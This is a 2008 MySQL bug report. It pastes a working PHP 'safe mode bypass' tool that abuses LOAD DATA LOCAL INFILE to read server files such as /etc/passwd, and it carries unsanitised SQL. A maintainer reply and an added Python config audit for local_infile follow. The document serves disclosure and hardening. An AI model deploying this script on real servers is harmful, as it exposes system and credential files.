Bug #33689 Mysql Bypass (MySQL Safe Mode Bypass Vulnerability)
Submitted: 4 Jan 2008 12:05
Modified: 4 Jan 2008 15:25
Reporter: Masood Yarmohammadi
Status: Not a Bug
Category: MySQL Server
Severity: S3 (Non-critical)
Version: 5.0.45-community
OS: Any (Mysql Bypass)
CPU Architecture: Any
Tags: bypass, MySQL, php

[4 Jan 2008 12:05] Masood Yarmohammadi
Description:
A hacker can bypass our MySQL and view any hosted files on the server with the following script:

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="keywords" content="Mysql Bypass,Ashiyane Digital Security Team ,Sha2ow">
<meta name="description" content="Mysql Bypass - Ashiyane Digital Security Team . Sha2ow">
<title>Mysql Bypass - Ashiyane Digital Security Team .</title>
</head>

<body text="#FFFFFF" bgcolor="#000000">

<p align="center">
<br>
<font face="Tahoma" style="font-size: 15pt; font-weight: 700">Ashiyane Digital Security Team<br>
Mysql Bypass <br>
</font><font face="Tahoma" size="2">4.4.7 / 5.2.3 PHP ver -&nbsp; MySQL Safe 
Mode Bypass Vulnerability<br>
only ,
Create mysql database and add user for mysql database</font><font face="Tahoma" style="font-size: 10pt; font-weight: 700"><br>
&nbsp;</font></p>
<div align="center">

<form method="post">

	<table border="0" cellspacing="1" width="859" height="6%">
		<tr>
			<td width="311"><font face="Tahoma"><span style="font-size: 9pt">&nbsp;DataBase 
			Name : <input type="text" name="dbname" size="20">&nbsp;&nbsp;&nbsp; 
			</span></font></td>
			<td width="240"><font face="Tahoma"><span style="font-size: 9pt">
			Username :&nbsp; <input type="text" name="dbuser" size="20">&nbsp;&nbsp;</span></font></td>
			<td width="298"><font face="Tahoma"><span style="font-size: 9pt">&nbsp;Password 
			:&nbsp; <input type="text" name="dbpass" size="20"></span></font></td>
		</tr>
		<tr>
			<td width="311" valign="middle">
			&nbsp;</td>
			<td width="240" valign="middle">
			&nbsp;</td>
			<td width="298" valign="middle">
			&nbsp;</td>
		</tr>
		<tr>
			<td width="554" valign="middle" colspan="2">
			<p align="left"><font face="Tahoma"><span style="font-size: 9pt">
			File Path :&nbsp;&nbsp;
			<input type="text" name="path1" size="45" style=" weight:200; height:21; width:229" dir="ltr" value="/etc/passwd">&nbsp;<input type="submit" value="Bypass" name="exec"></span></font></td>
			<td width="298" valign="middle">
			&nbsp;</td>
		</tr>
		<tr>
			<td width="855" valign="middle" colspan="3">
			<br>
			<?
if(!empty($_POST['dbname']) && !empty($_POST['dbuser']) && !empty($_POST['dbpass']) && !empty($_POST['path1'])) 
{
$dbname = $_POST['dbname'];
$dbuser = $_POST['dbuser'];
$dbpass = $_POST['dbpass'];
$path1 = $_POST['path1'];
if(mysql_connect( "localhost", $dbuser, $dbpass ))
{
$drop= "DROP TABLE $dbname.`bypass`" ;
$query = "CREATE TABLE $dbname.`bypass` (`fileview` VARCHAR( 2048 ) NOT NULL);";
mysql_query($drop);
mysql_query($query);
mysql_query("LOAD DATA LOCAL INFILE " . "'$path1'"  . " INTO TABLE " . $dbname . ".bypass");
$result =mysql_db_query($dbname,"SELECT * FROM bypass ");
$numrows = mysql_num_rows($result); 
?>

<textarea rows="15" name="result" cols="103">
<?   
while($row = mysql_fetch_array($result))   { 
echo $row[fileview] ; 

    } 
}

}

?>
</textarea></td>  	

		</tr>
	</table>
	</form>
</div>
<p align="center"><font face="Tahoma" size="2" color="#FF0000">&nbsp;Ashiyane 
Digital Security Team - Copyright Sha2ow.</font></p>

How to repeat:
How can I patch this?
[4 Jan 2008 15:25] Sergei Golubchik
We're sorry, but the bug system is not the appropriate forum for asking help on using MySQL products. Your problem is not the result of a bug.

Support on using our products is available both free in our forums at http://forums.mysql.com/ and for a reasonable fee direct from our skilled support engineers at http://www.mysql.com/support/

Thank you for your interest in MySQL.
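
The script in the report depends on `LOAD DATA LOCAL INFILE`, which has the client (here the PHP process) read a file and send it to the server, so it only works when both the client and the server allow it. The following is an added example, not part of the bug report and not MySQL's own code: a small audit that checks a `my.cnf` and a `php.ini` for the server option `local_infile` and the PHP directives `mysql.allow_local_infile` and `mysqli.allow_local_infile`. The function names and the sample config texts are constructed for illustration, and an unset value is reported conservatively on the assumption that the default may be enabled.

```python
import re

# Values this audit accepts as "disabled"; anything else is reported.
OFF = {"0", "off", "false"}

# Constructed sample configs: a permissive pair and a hardened pair.
WEAK_MY_CNF = "[mysqld]\nport=3306\nlocal-infile\n"
HARD_MY_CNF = "[mysqld]\nport=3306\nlocal-infile=0\n"
WEAK_PHP_INI = "[MySQL]\nmysql.allow_local_infile = On\n"
HARD_PHP_INI = ("[MySQL]\nmysql.allow_local_infile = Off\n"
                "[MySQLi]\nmysqli.allow_local_infile = Off ; client side\n")

def parse_ini(text):
    """Return {section: {key: value}}; keys lowercased, '-' folded to '_'."""
    section, out = "", {}
    for raw in text.splitlines():
        # Drop '#' and ';' comments (enough for the boolean options audited).
        line = re.split(r"[#;]", raw, maxsplit=1)[0].strip()
        if not line:
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            section = m.group(1).strip().lower()
            continue
        key, sep, val = line.partition("=")
        key = key.strip().lower().replace("-", "_")
        # A bare option name with no "=value" switches the option on in my.cnf.
        val = val.strip().strip("\"'").lower() if sep else "1"
        out.setdefault(section, {})[key] = val
    return out

def audit(my_cnf, php_ini):
    """List every place where LOAD DATA LOCAL is not explicitly disabled."""
    findings = []
    srv = parse_ini(my_cnf).get("mysqld", {}).get("local_infile")
    if srv not in OFF:
        findings.append("my.cnf [mysqld]: local_infile is %s" % (srv or "unset"))
    php = {}
    for keys in parse_ini(php_ini).values():  # section names do not matter here
        php.update(keys)
    for d in ("mysql.allow_local_infile", "mysqli.allow_local_infile"):
        if php.get(d) not in OFF:
            findings.append("php.ini: %s is %s" % (d, php.get(d) or "unset"))
    return findings

if __name__ == "__main__":
    for finding in audit(WEAK_MY_CNF, WEAK_PHP_INI):
        print(finding)
```
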